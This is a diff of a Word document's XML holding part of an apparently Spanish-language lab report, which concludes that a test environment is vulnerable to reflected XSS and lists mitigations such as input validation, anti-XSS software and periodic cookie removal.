+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E7D787E" wp14:editId="5DA498E3">
+            <wp:extent cx="5419090" cy="2933700"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1742962930" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1742962930" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5432475" cy="2940946"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="708"/>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -2399,147 +2855,745 @@
           <w:lang w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve">Este código es vulnerable </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>a la</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Inclusión de Archivos Locales (LFI)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>, con lo que u</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>n</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> actor malicioso</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> p</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>odría</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> manipular el parámetro </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>“</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:i/>
-          <w:iCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>page</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:i/>
-          <w:iCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>”</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> en la URL para incluir archivos locales del servidor. Por ejemplo:</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t>En definitiva, se comprueba que este entorno de prueba, es vulnerable a ataques XSS-Reflected. Sin embargo, e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>n un entorno de producción</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> debería haber una fase anterior, que consistiría en ganar la confianza del usuario usando para ello técnicas de ingeniería social. </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Por todo ello, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>es</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>importante</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> asegurarse que cualquier entrada del usuario sea adecuadamente validada y escapada</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">antes de ser incluida en </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>su</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> salida</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>para evitar este tipo de vulnerabilidades.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>2.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>2.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Mitigación</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> del riesgo</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Para mitigar </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">los efectos de </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>esta vulnerabilidad, es crucial validar y sanitizar todas las entradas del usuario</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>, con alguna/s de las siguientes recomendaciones:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Prrafodelista"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="38"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Client side:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Prrafodelista"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="39"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Antivirus y aplicaciones instaladas y actualizad</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>as</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Prrafodelista"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="39"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>El uso de software anti – XSS, como XSSAuditor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Refdenotaalpie"/>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:footnoteReference w:id="3"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, que analizan las solicitudes HTTP y elimina algunos JavaScript sospechosos. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Prrafodelista"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="39"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Eliminación de cookies cada cierto tiempo.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Prrafodelista"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="38"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Host </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>side</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Prrafodelista"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="41"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Iljf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLconformatoprevio"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="38"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
